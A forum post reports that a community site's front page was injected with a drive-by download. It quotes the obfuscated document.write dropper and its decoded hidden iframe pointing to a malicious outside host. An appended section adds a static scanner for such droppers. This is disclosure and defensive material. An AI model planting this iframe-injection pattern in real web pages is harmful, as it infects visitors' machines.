Thread: B1 Infected !
  #18  
11th Nov 07, 08:47 PM
Cactus
DoG,

Now don't tell me you really couldn't find this....

The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code:

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>BetaONE Hotfix</title>
</head>
<body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
<meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" />
</body>
</html>
The JavaScript code (unescaped) is
Code:
<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>
That page (after some more site switching) eventually leaves you infected with what Symantec calls Trojan.Exploit.131 (see http://securityresponse.symantec.com...033008-3019-99) after which it loads the betaone.net/forum page as if all is well.

So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, I mean, come on

Oh, and I saw today is your birthday. Congratulations! Have a beer on me!

Anyways,
Cheers,

Le Cactus
__________________
Quote:
Several security vulnerabilities in Firefox and the Mozilla Suite of Internet software put users of the open-source products at risk of hacker attacks, the Mozilla Foundation is warning.
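The check described in the post above (decode the `document.write(unescape('...'))` argument and look at what it writes) can be done statically, without rendering the page. This is an added example, not part of the original post; the function names, the `example.invalid` URLs and the sample page are constructed for illustration.

```javascript
// Static scan for document.write(unescape('...')) droppers in served HTML.
// Nothing is executed: the argument is only decoded and inspected as text.

// Decode %XX escapes the way unescape() does for single-byte sequences.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return one finding per obfuscated document.write call found in the HTML.
function scanHtml(html) {
  const call = /document\.write\s*\(\s*unescape\s*\(\s*(['"])([^'"]*)\1\s*\)\s*\)/gi;
  const findings = [];
  for (const m of html.matchAll(call)) {
    const decoded = decodePercent(m[2]);
    const frame = /<iframe\b[^>]*>/i.exec(decoded);
    if (!frame) {
      findings.push({ decoded, iframeSrc: null, hidden: false });
      continue;
    }
    // Read one attribute (quoted or unquoted) from the decoded <iframe> tag.
    const attr = (name) => {
      const a = new RegExp("\\b" + name + "\\s*=\\s*[\"']?([^\"'\\s>]+)", "i").exec(frame[0]);
      return a ? a[1] : null;
    };
    const w = parseInt(attr("width"), 10);
    const h = parseInt(attr("height"), 10);
    // A frame of at most 1x1 pixels is invisible to the visitor.
    findings.push({ decoded, iframeSrc: attr("src"), hidden: w <= 1 && h <= 1 });
  }
  return findings;
}

// Constructed sample (not the payload from the post): every character %-encoded.
const encode = (s) =>
  [...s].map((c) => "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
const PLAIN = '<iframe src="http://example.invalid/landing" width=1 height=1></iframe>';
const SAMPLE =
  '<body><Script Language="Javascript">document.write(unescape(\'' + encode(PLAIN) +
  '\'));</script><meta http-equiv="refresh" content="0; url=http://example.invalid/forum" /></body>';

console.log(scanHtml(SAMPLE));
```

Run over the files a web server actually serves (or over saved responses), a finding with `hidden: true` and an off-site `iframeSrc` is the pattern the post describes in index.php.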